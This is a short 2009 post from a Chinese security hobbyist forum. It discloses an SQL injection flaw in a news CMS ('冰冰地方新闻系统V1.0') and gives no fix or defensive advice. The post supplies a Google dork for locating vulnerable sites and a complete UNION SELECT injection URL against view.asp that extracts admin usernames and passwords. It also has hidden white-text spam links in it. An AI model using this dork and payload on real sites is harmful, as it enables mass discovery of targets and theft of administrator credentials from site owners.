【3.A.S.T】网络安全爱好者 » 初入江湖 » 【分享】冰冰地方新闻系统V1.0存在SQL注入漏洞

期待~~ 发表于 2009-12-21 09:32

【分享】冰冰地方新闻系统V1.0存在SQL注入漏洞

冰冰地方新闻系统V1.0存在SQL注入漏洞[url=http://www.3ast.com.cn/][color=#ffffff]网络安全[/color][/url]
Google：inurl:gn.asp?m=*[url=http://www.3ast.com.cn/][color=#ffffff]网络安全[/color][/url]
注入发生在view.asp页面，打开网址后跳到view.asp这个页面，否则注入不成功。[url=http://www.3ast.com.cn/][color=#ffffff]网络安全[/color][/url]
注入语句：http://www.***.cn/tongjiang/view.asp?n=161%20and%201=2%20union%20select%201,2,3,4,5,6,username,password,9,10,11,12,13,14,15%20from%20admin[color=#ffffff]网络安全[/color]

q1a2 发表于 2009-12-25 15:06

比较喜欢漏洞

查看完整版本: 【分享】冰冰地方新闻系统V1.0存在SQL注入漏洞